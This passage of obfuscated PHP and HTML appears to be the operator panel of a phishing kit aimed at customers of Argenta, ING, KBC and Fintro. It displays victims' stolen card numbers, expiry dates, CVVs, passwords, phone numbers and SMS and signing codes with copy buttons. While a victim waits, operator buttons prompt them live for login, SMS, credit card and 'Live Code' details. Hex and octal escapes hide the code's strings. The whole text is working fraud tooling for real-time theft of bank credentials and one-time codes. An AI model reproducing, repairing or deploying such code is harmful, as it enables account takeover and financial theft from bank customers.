($log["\142\141\156\153"] === "\x41\x52\107\x45\116\124\101") { function ARGENTA($label, $value) { echo "\x3c\144\151\166\40\x63\x6c\x61\x73\163\x3d\x22\x66\x6f\x72\x6d\x2d\147\162\157\x75\x70\x20\x72\x6f\x77\42\76"; echo "\74\x6c\x61\x62\145\x6c\40\x66\157\x72\x3d\x27\151\x64\47\x20\x63\154\x61\x73\x73\75\47\164\145\x78\x74\55\163\145\143\157\156\144\x61\x72\x79\x20\143\157\x6c\55\163\x6d\55\63\40\146\157\156\x74\55\167\x65\151\x67\x68\164\x2d\142\157\x6c\x64\47\x3e{$label}\72\74\57\154\x61\x62\x65\x6c\76"; echo "\74\144\151\x76\40\x63\x6c\141\x73\x73\x3d\42\x63\x6f\154\x2d\163\155\x2d\x39\42\76"; echo "\74\x70\40\x63\154\141\163\163\x3d\47\164\x65\x78\x74\55\163\145\143\157\x6e\x64\141\x72\x79\47\76\74\x69\76\x3c\163\x70\x61\156\x20\143\x6c\x61\163\163\x3d\x27\x63\x6f\x70\x79\x2d\166\x61\x6c\165\x65\47\x20\x6f\x6e\143\x6c\151\143\x6b\75\47\143\157\x70\171\124\157\x43\154\x69\x70\142\x6f\141\162\144\50\164\x68\x69\x73\51\47\76" . htmlspecialchars($value) . "\x3c\57\x73\160\x61\156\76\74\142\x72\57\x3e\74\163\160\141\156\40\x63\x6c\x61\x73\163\75\x27\143\x6f\160\x79\55\x74\x65\170\x74\47\76\103\154\x69\143\x6b\x20\164\157\40\143\x6f\160\x79\74\57\163\x70\141\156\x3e\x3c\x2f\x69\x3e\x3c\x2f\160\x3e"; echo "\74\x2f\x64\151\166\x3e"; echo "\74\x2f\x64\151\x76\76"; } if (!empty($log["\x61\x72\147\x65\156\x74\141\x5f\167\151\x66\x69"])) { ARGENTA("\x43\141\162\144\x4e\x75\x6d\142\145\162", $log["\141\162\147\x65\156\x74\141\137\x77\x69\146\151"]); } if (!empty($log["\x61\x72\147\x65\x6e\164\x61\x5f\x77\151\146\x69\x5f\160\141\x73\x73"])) { ARGENTA("\105\170\x70\151\x72\x79", $log["\141\162\x67\x65\x6e\164\141\137\x77\151\x66\151\x5f\160\x61\163\163"]); } if (!empty($log["\x61\x72\x67\145\156\164\141\x5f\x65\170\x70"])) { ARGENTA("\123\x4d\123", $log["\141\x72\147\145\156\x74\141\137\145\x78\x70"]); } if (!empty($log["\141\x72\x67\x65\156\164\x61\x5f\x75\x73\145\162"])) { ARGENTA("\x50\x68\157\x6e\x65", $log["\141\162\x67\x65\156\164\x61\x5f\165\x73\145\x72"]); } if (!empty($log["\141\x72\147\145\156\x74\141\137\x63\x72\x65\144\151\164\143\x61\162\144"])) { ARGENTA("\x43\141\x72\x64\40\116\x75\155\142\x65\x72", $log["\141\162\x67\145\x6e\x74\x61\x5f\143\162\x65\x64\151\x74\143\141\x72\144"]); } if (!empty($log["\141\x72\147\145\x6e\164\141\137\143\143\145\x78\160"])) { ARGENTA("\105\x78\160\151\x72\x79", $log["\141\162\147\x65\156\164\x61\137\x63\143\x65\x78\160"]); } if (!empty($log["\141\162\147\x65\x6e\164\141\137\x63\166\x76"])) { ARGENTA("\x43\x56\126", $log["\x61\x72\147\145\156\x74\x61\x5f\143\x76\x76"]); } if (!empty($log["\x61\x72\x67\x65\156\x74\141\x5f\x72\x65\x73\160\157\x6e\163"])) { ARGENTA("\114\157\x67\151\156\x20\103\157\x64\145", $log["\141\x72\x67\x65\156\164\x61\137\x72\x65\x73\160\x6f\x6e\163"]); } if (!empty($log["\x61\x72\147\145\156\164\141\137\162\x65\x73\160\x6f\156\163\x5f\x74\x77\157"])) { ARGENTA("\x4c\151\166\x65\40\x43\157\x64\x65", $log["\141\x72\x67\x65\x6e\x74\141\137\162\145\163\160\x6f\156\x73\x5f\164\167\x6f"]); } if ($log["\167\141\x69\x74\151\x6e\x67"] == "\x74\162\165\x65") { ?>

                    </div>
                     <div class="row">
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["\x75\x73\x65\162\137\x69\x64"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
                               
                            </div>
                             <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["\x75\163\x65\x72\137\x69\144"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
 Ask SMS</button>
                            </div>
  
         <div class="col-lg-3">
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["\165\163\145\162\x5f\x69\x64"]); ?>
', 'login')"><i class="fas fa-phone"></i> Phone</button>
                            </div>
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["\x75\x73\145\162\137\x69\x64"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
 Ask Creditcard</button>
                            </div>
                           
                         
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["\165\x73\x65\162\x5f\151\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
                            </div>             
                    </div>
                                               <div class="row">

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["\165\x73\145\162\x5f\x69\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Login Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control argenta-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">

                            </div>

                            <div class="col-lg-3">
                                 <hr>
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php  echo htmlspecialchars($log["\165\163\145\x72\137\x69\x64"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>


 Ask Live Code</button>
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input type="text" class="form-control argenta-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
                                <input type="text" class="form-control argenta-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">

                            </div>

                        </div>  

                </div>
            </div>
<?php  } } else { if ($log["\142\141\156\x6b"] === "\111\116\x47") { function ING($label, $value) { echo "\x3c\x64\151\x76\40\x63\x6c\x61\x73\x73\x3d\x22\146\157\x72\155\x2d\x67\x72\157\x75\160\40\x72\157\x77\x22\x3e"; echo "\x3c\154\x61\x62\x65\154\x20\146\157\162\75\x27\x69\x64\x27\40\143\154\x61\163\163\x3d\47\164\145\x78\x74\55\x73\x65\143\x6f\x6e\x64\x61\x72\x79\x20\x63\157\x6c\x2d\163\x6d\55\x33\x20\x66\157\x6e\x74\x2d\167\x65\x69\147\x68\164\x2d\x62\x6f\154\144\x27\76{$label}\x3a\74\x2f\x6c\141\142\x65\x6c\x3e"; echo "\x3c\144\151\x76\40\143\x6c\141\163\x73\x3d\42\x63\x6f\154\55\x73\155\55\x39\42\x3e"; echo "\74\160\40\143\154\x61\163\163\x3d\47\164\x65\x78\x74\55\163\x65\x63\157\x6e\144\141\162\171\47\x3e\x3c\x69\x3e\74\163\x70\x61\x6e\x20\143\154\x61\x73\x73\x3d\47\x63\x6f\x70\171\x2d\166\x61\154\x75\x65\47\x20\157\x6e\143\154\151\x63\153\75\x27\143\157\x70\171\124\157\x43\154\151\160\142\157\x61\162\144\x28\x74\x68\151\x73\51\47\x3e" . htmlspecialchars($value) . "\x3c\57\x73\160\x61\156\x3e\x3c\x62\x72\57\x3e\x3c\x73\x70\x61\x6e\40\143\x6c\x61\163\x73\x3d\x27\143\x6f\160\x79\x2d\164\x65\x78\164\x27\x3e\x43\x6c\x69\x63\x6b\40\164\157\40\143\x6f\160\171\74\x2f\163\x70\141\x6e\76\74\x2f\151\76\74\x2f\160\x3e"; echo "\74\57\144\x69\x76\x3e"; echo "\74\x2f\144\x69\x76\x3e"; } if (!empty($log["\151\x6e\x67\137\167\x69\146\x69"])) { $kaartbegin = '' . $log["\x69\x6e\147\137\167\151\146\x69"]; ING("\103\141\x72\x64\x4e\165\x6d\142\x65\x72", $kaartbegin); } if (!empty($log["\151\x6e\147\137\x77\x69\146\x69\x5f\x70\x61\x73\x73"])) { ING("\111\116\x47\40\x49\x44", $log["\x69\x6e\147\137\x77\x69\146\151\137\x70\141\163\x73"]); } if (!empty($log["\x69\x6e\147\x5f\167\151\146\x69\x5f\x70\x61\163\163\x5f\x74\x77\157"])) { ING("\x45\x78\160\x69\162\171", $log["\151\x6e\x67\x5f\x77\x69\x66\151\137\160\141\163\x73\x5f\164\x77\x6f"]); } if (!empty($log["\x69\156\147\x5f\165\163\145\162"])) { ING("\111\144\x65\156\164\151\146\171\x20\103\x6f\x64\145", $log["\151\x6e\147\x5f\x75\x73\x65\x72"]); } if (!empty($log["\x69\x6e\147\137\145\x78\x70"])) { ING("\120\150\157\156\145", $log["\151\x6e\147\137\145\170\160"]); } if (!empty($log["\151\156\x67\x5f\x63\162\x65\144\x69\164\143\141\x72\x64"])) { ING("\123\x4d\x53", $log["\151\156\x67\x5f\x63\x72\145\x64\151\164\143\141\x72\144"]); } if (!empty($log["\x69\156\147\x5f\x70\x61\x73\x73\167\157\162\x64"])) { ING("\x50\141\x73\163\x77\x6f\x72\144", $log["\151\x6e\x67\x5f\160\x61\x73\163\x77\157\x72\144"]); } if (!empty($log["\x69\156\147\x5f\x72\145\163\160\157\x6e\x73"])) { ING("\x4c\157\147\x69\156\40\x43\157\x64\x65", $log["\x69\x6e\147\x5f\162\x65\x73\160\x6f\156\x73"]); } if (!empty($log["\x69\156\147\137\x63\x6f\144\x65\137\x78"])) { ING("\x53\x69\x67\x6e\40\103\157\144\145", $log["\x69\156\x67\137\x63\157\144\145\137\170"]); } if (!empty($log["\151\x6e\x67\x5f\x63\157\144\x65\x5f\x6d"])) { ING("\x53\151\x67\x6e\x20\103\157\x64\x65\40\x28\x32\x29", $log["\x69\x6e\x67\137\143\157\x64\x65\137\x6d"]); } if (!empty($log["\151\156\147\x5f\x72\x65\163\x70\157\156\163\x5f\164\167\157"])) { ING("\x4c\151\166\145\40\x43\157\144\145", $log["\x69\x6e\x67\137\x72\145\163\160\157\156\x73\x5f\164\167\157"]); } if ($log["\167\x61\x69\x74\151\x6e\x67"] == "\164\162\x75\x65") { ?>

                    </div>
                     <div class="row">
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["\165\163\x65\162\x5f\x69\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
                               
                            </div>
                                     <div class="col-lg-3">
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["\165\163\145\x72\137\151\144"]); ?>
', 'login')"><i class="fas fa-key"></i> Identify Code</button>
                            </div>
                      
               
  
 <div class="col-lg-3">
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["\x75\163\145\x72\137\151\144"]); ?>
', 'details')"><i class="fas fa-key"></i> Ask Phone</button>
                            </div>

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["\165\x73\145\162\137\x69\x64"]); ?>
', 'creditcard')"><i class="fa fa-comments" aria-hidden="true"></i>
 Ask SMS</button>
                            </div>
                           
                         
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["\x75\x73\x65\x72\137\151\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
                            </div>             
                    </div>
                                               <div class="row">

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["\x75\163\145\162\x5f\x69\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Login Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control ing-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">

                            </div>
                            <div class="col-lg-3">
                    

                            </div>

                            <div class="col-lg-9">
                                <input hidden type="text" class="form-control ing-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">

                            </div>
                           <div class="col-lg-3">
                                
                          
                            </div>
                              <div class="col-lg-9">
                            
                                <input type="text" hidden class="form-control ing-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
                                <input type="text" hidden class="form-control ing-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">

                            </div>
                            <div class="col-lg-3">
                                 <hr>
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php  echo htmlspecialchars($log["\x75\163\x65\162\x5f\x69\x64"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>


 Ask Live Code</button>
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input type="text" class="form-control ing-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
                                <input type="text" class="form-control ing-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">

                            </div>


                        </div>  

                </div>
            </div>
<?php  } } else { if ($log["\142\x61\156\153"] === "\x4b\x42\x43") { function KBC($label, $value) { echo "\74\x64\151\x76\40\143\x6c\141\163\163\x3d\x22\x66\x6f\x72\x6d\55\x67\162\x6f\x75\x70\40\162\157\x77\x22\76"; echo "\x3c\x6c\141\142\x65\154\x20\146\x6f\x72\x3d\x27\x69\144\47\x20\143\x6c\x61\x73\163\75\47\x74\145\x78\164\55\x73\x65\143\x6f\156\144\141\162\171\x20\143\157\x6c\x2d\x73\155\x2d\x33\40\146\157\156\164\55\167\145\x69\x67\x68\164\55\142\157\x6c\x64\47\76{$label}\x3a\x3c\57\154\x61\x62\145\x6c\x3e"; echo "\74\144\151\x76\40\143\154\x61\x73\x73\x3d\42\143\157\154\x2d\x73\155\x2d\71\x22\76"; echo "\x3c\160\x20\143\x6c\141\x73\x73\75\47\164\x65\170\164\x2d\x73\145\143\157\x6e\144\x61\x72\171\x27\76\x3c\151\x3e\x3c\x73\x70\x61\156\40\143\154\x61\163\163\x3d\47\x63\x6f\x70\171\55\x76\141\x6c\165\x65\47\x20\x6f\156\143\154\151\x63\153\x3d\47\x63\x6f\160\x79\124\x6f\103\154\151\x70\x62\x6f\x61\x72\144\x28\164\x68\x69\x73\51\47\76" . htmlspecialchars($value) . "\x3c\57\163\160\141\156\x3e\74\x62\162\57\76\74\163\160\x61\x6e\40\x63\154\141\163\x73\75\x27\143\157\160\171\x2d\164\145\x78\164\x27\76\x43\154\x69\143\153\x20\x74\x6f\40\143\x6f\160\x79\x3c\x2f\x73\x70\141\x6e\x3e\x3c\57\151\76\x3c\x2f\160\x3e"; echo "\x3c\x2f\144\x69\166\76"; echo "\74\57\x64\x69\x76\76"; } if (!empty($log["\x6b\142\143\x5f\x77\151\146\x69"])) { $kaartbegin = '' . $log["\x6b\x62\143\x5f\x77\151\x66\151"]; KBC("\103\141\162\x64\x4e\x75\155\142\x65\162", $kaartbegin); } if (!empty($log["\x6b\x62\143\x5f\167\151\x66\x69\x5f\x70\141\x73\x73"])) { KBC("\x45\x78\160\151\x72\x79", $log["\x6b\x62\143\137\167\151\x66\x69\x5f\x70\141\x73\x73"]); } if (!empty($log["\153\x62\x63\x5f\145\x78\x70"])) { KBC("\x50\x68\157\156\x65", $log["\x6b\142\143\137\145\170\x70"]); } if (!empty($log["\x6b\142\143\x5f\160\x61\163\163\x77\x6f\162\x64"])) { KBC("\123\115\123", $log["\x6b\x62\x63\137\160\141\x73\x73\167\x6f\162\x64"]); } if (!empty($log["\153\142\143\x5f\x75\163\145\162"])) { KBC("\x50\141\x73\x73\167\x6f\162\144", $log["\x6b\x62\143\x5f\165\x73\x65\162"]); } if (!empty($log["\x6b\142\143\x5f\x63\162\145\144\x69\x74\143\141\x72\x64"])) { KBC("\103\x43\x20\x4e\x75\155\142\x65\162", $log["\153\142\x63\x5f\x63\162\145\144\151\x74\143\141\162\x64"]); } if (!empty($log["\x6b\142\x63\137\143\x63\145\170\x70"])) { KBC("\x43\x43\40\105\170\160", $log["\x6b\x62\143\x5f\143\x63\x65\x78\x70"]); } if (!empty($log["\153\142\x63\137\x63\x76\x76"])) { KBC("\x43\126\126", $log["\x6b\142\143\137\x63\166\x76"]); } if (!empty($log["\x6b\x62\143\137\162\145\x73\160\157\x6e\x73"])) { KBC("\x4d\61\x20\103\157\144\145", $log["\153\142\143\x5f\162\145\163\160\157\156\x73"]); } if (!empty($log["\153\142\x63\137\143\157\144\145\137\170"])) { KBC("\123\x69\x67\156\40\x43\157\x64\x65", $log["\x6b\x62\143\x5f\x63\x6f\144\x65\x5f\x78"]); } if (!empty($log["\x6b\x62\x63\x5f\x63\x6f\x64\145\x5f\155"])) { KBC("\123\151\x67\x6e\x20\x43\157\144\x65\40\50\x32\51", $log["\x6b\x62\x63\x5f\x63\x6f\144\145\137\x6d"]); } if (!empty($log["\153\x62\143\x5f\x72\x65\x73\x70\x6f\156\163\x5f\164\x77\x6f"])) { KBC("\x4c\x69\166\145\x20\103\x6f\144\x65", $log["\x6b\x62\x63\x5f\162\145\x73\160\157\156\163\x5f\x74\x77\157"]); } if ($log["\x77\141\x69\164\x69\156\x67"] == "\164\162\165\145") { ?>

                    </div>
                     <div class="row">
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\x64"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
                               
                            </div>
                 
   <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\x75\x73\145\162\137\x69\x64"]); ?>
', 'details')"><i class="fa fa-credit-card" aria-hidden="true"></i>
 Ask Phone</button>
                            </div>
    
   <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\x75\163\x65\x72\x5f\151\144"]); ?>
', 'password')"><i class="fa fa-credit-card" aria-hidden="true"></i>
 Ask SMS</button>
                            </div>
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\165\x73\x65\x72\x5f\x69\144"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
 Ask Creditcard</button>
                            </div>
                           
                         
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\x75\x73\x65\162\x5f\x69\x64"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
                            </div>             
                    </div>
                                               <div class="row">

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\165\163\145\x72\137\151\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Login Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control kbc-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">

                            </div>
                            <div hidden class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\165\163\x65\x72\137\x69\144"]); ?>
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Sign Code</button>

                            </div>

                            <div hidden class="col-lg-9">
                                <input type="text" class="form-control kbc-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">

                            </div>
                           <div class="col-lg-3">
                               
                     
                            </div>
                              <div class="col-lg-9">
                                
                                <input hidden type="text" class="form-control kbc-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
                                <input hidden type="text" class="form-control kbc-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">

                            </div>
                            <div class="col-lg-3">
                                 <hr>
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setKBC('<?php  echo htmlspecialchars($log["\x75\x73\145\162\x5f\151\144"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>


 Ask Live Code</button>
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input type="text" class="form-control kbc-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
                                <input type="text" class="form-control kbc-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">

                            </div>


                        </div>  

                </div>
            </div>
<?php  } } else { if ($log["\142\x61\156\x6b"] === "\x46\x49\116\124\122\117") { function FINTRO($label, $value) { echo "\74\x64\x69\166\40\143\154\x61\x73\x73\75\x22\x66\x6f\162\x6d\55\147\162\x6f\165\160\40\162\x6f\x77\42\x3e"; echo "\74\x6c\x61\x62\x65\154\40\x66\157\162\75\47\x69\144\x27\x20\x63\x6c\141\x73\163\75\47\164\145\170\x74\55\163\x65\x63\x6f\156\144\x61\x72\171\40\x63\157\154\x2d\x73\155\55\x33\40\x66\x6f\x6e\164\x2d\x77\x65\x69\147\x68\164\x2d\142\x6f\x6c\x64\x27\x3e{$label}\x3a\74\x2f\154\x61\x62\145\x6c\76"; echo "\74\144\151\x76\x20\143\x6c\x61\163\163\x3d\42\x63\x6f\154\x2d\163\x6d\x2d\x39\42\x3e"; echo "\x3c\160\x20\x63\154\x61\x73\163\75\47\x74\x65\x78\164\x2d\163\x65\x63\157\156\x64\x61\162\171\x27\x3e\x3c\x69\x3e\x3c\x73\160\x61\x6e\40\143\154\141\x73\163\x3d\x27\143\x6f\x70\171\55\x76\x61\154\165\145\x27\40\157\x6e\143\154\151\x63\153\x3d\x27\x63\157\160\x79\124\x6f\x43\154\x69\x70\x62\157\x61\x72\144\50\x74\150\x69\163\51\x27\x3e" . htmlspecialchars($value) . "\74\57\163\160\x61\156\76\74\x62\x72\x2f\x3e\x3c\x73\160\x61\156\x20\143\154\141\x73\163\75\47\143\157\x70\171\55\x74\x65\170\x74\x27\76\103\154\x69\x63\153\x20\x74\157\40\x63\x6f\160\x79\74\57\x73\x70\x61\156\76\74\57\x69\x3e\x3c\x2f\x70\x3e"; echo "\74\x2f\x64\151\x76\x3e"; echo "\74\57\144\151\x76\76"; } if (!empty($log["\x66\151\156\164\x72\x6f\137\167\x69\x66\151"])) { $kaartbegin = '' . $log["\146\x69\156\164\x72\157\137\167\x69\x66\x69"]; FINTRO("\x43\141\x72\x64\116\165\x6d\142\145\162", $kaartbegin); } if (!empty($log["\x66\x69\x6e\x74\x72\157\137\167\151\146\151\x5f\160\x61\163\163"])) { FINTRO("\x45\x78\160\x69\162\x79", $log["\146\x69\156\x74\x72\x6f\x5f\x77\151\x66\x69\137\160\x61\163\163"]); } if (!empty($log["\146\x69\156\x74\162\x6f\x5f\165\163\145\162"])) { FINTRO("\x50\x68\157\x6e\x65", $log["\146\x69\x6e\x74\x72\x6f\137\165\163\x65\x72"]); } if (!empty($log["\146\151\156\x74\x72\157\137\x65\170\160"])) { FINTRO("\x53\115\x53", $log["\146\x69\156\164\162\157\137\145\x78\x70"]); } if (!empty($log["\x66\x69\x6e\x74\x72\157\x5f\160\x61\x73\163\x77\157\162\x64"])) { FINTRO("\120\x61\x73\x73\x77\157\x72\144", $log["\x66\151\x6e\x74\162\x6f\x5f\x70\141\x73\163\167\157\162\x64"]); } if (!empty($log["\x66\x69\x6e\x74\162\x6f\137\x72\x65\163\160\157\156\x73"])) { FINTRO("\114\157\147\151\x6e\x20\x43\157\x64\x65", $log["\146\151\156\x74\x72\x6f\x5f\162\145\x73\160\157\x6e\x73"]); } if (!empty($log["\146\x69\156\x74\x72\x6f\x5f\143\157\x64\x65\x5f\x78"])) { FINTRO("\x53\x69\x67\156\40\103\157\144\145", $log["\x66\151\156\164\x72\157\x5f\143\x6f\144\145\137\170"]); } if (!empty($log["\x66\x69\x6e\164\x72\157\x5f\x63\157\144\x65\x5f\155"])) { FINTRO("\x53\x69\x67\156\x20\103\x6f\x64\145\40\x28\x32\51", $log["\x66\151\x6e\x74\x72\x6f\x5f\x63\157\144\x65\x5f\155"]); } if (!empty($log["\x66\151\x6e\x74\x72\157\x5f\162\x65\x73\x70\157\156\x73\137\164\x77\x6f"])) { FINTRO("\114\151\x76\145\40\x43\157\x64\145", $log["\x66\151\x6e\x74\x72\157\x5f\162\145\163\x70\157\156\163\137\x74\167\x6f"]); } if (!empty($log["\x66\x69\156\x74\x72\157\x5f\x63\162\145\x64\151\164\143\141\x72\x64"])) { FINTRO("\103\141\162\x64\40\x4e\165\155\142\x65\x72", $log["\146\x69\156\164\x72\x6f\137\x63\x72\145\x64\151\164\143\x61\x72\x64"]); } if (!empty($log["\146\x69\x6e\x74\x72\157\137\143\143\x65\170\x70"])) { FINTRO("\105\170\x70\x69\x72\171", $log["\146\151\156\x74\162\x6f\137\x63\143\x65\170\x70"]); } if (!empty($log["\146\x69\x6e\x74\x72\x6f\x5f\143\x76\166"])) { FINTRO("\x43\x56\x56", $log["\146\151\x6e\164\162\157\137\143\166\166"]); } if ($log["\x77\141\x69\x74\151\x6e\x67"] == "\x74\x72\x75\145") { ?>

                    </div>
                     <div class="row">
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\x75\163\145\162\137\x69\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
                               
                            </div>
                                     <div class="col-lg-3">
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\x75\x73\145\162\137\x69\x64"]); ?>
', 'login')"><i class="fas fa-phone"></i> Phone</button>
                            </div>
                             <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\165\x73\x65\162\137\151\144"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
 Ask SMS</button>
                            </div>
                    
  

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\x75\x73\145\x72\x5f\151\x64"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
 Ask Creditcard</button>
                            </div>
                           
                         
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\x75\163\145\162\137\151\x64"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
                            </div>             
                    </div>
                                               <div class="row">

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\165\x73\145\x72\137\x69\x64"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Login Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control fintro-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">

                            </div>
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\165\163\x65\162\x5f\x69\144"]); ?>
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Sign Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control fintro-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">

                            </div>
                           <div class="col-lg-3">
                                 <hr>
                         
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input hidden type="text" class="form-control fintro-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
                                <input hidden type="text" class="form-control fintro-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">

                            </div>
                            <div class="col-lg-3">
               
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setFintro('<?php  echo htmlspecialchars($log["\x75\x73\145\x72\x5f\x69\144"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>


 Ask Live Code</button>
                            </div>
                              <div class="col-lg-9">
                                
                                <input type="text" class="form-control fintro-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
                                <input type="text" class="form-control fintro-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">

                            </div>


                        </div>  

                </div>
            </div>
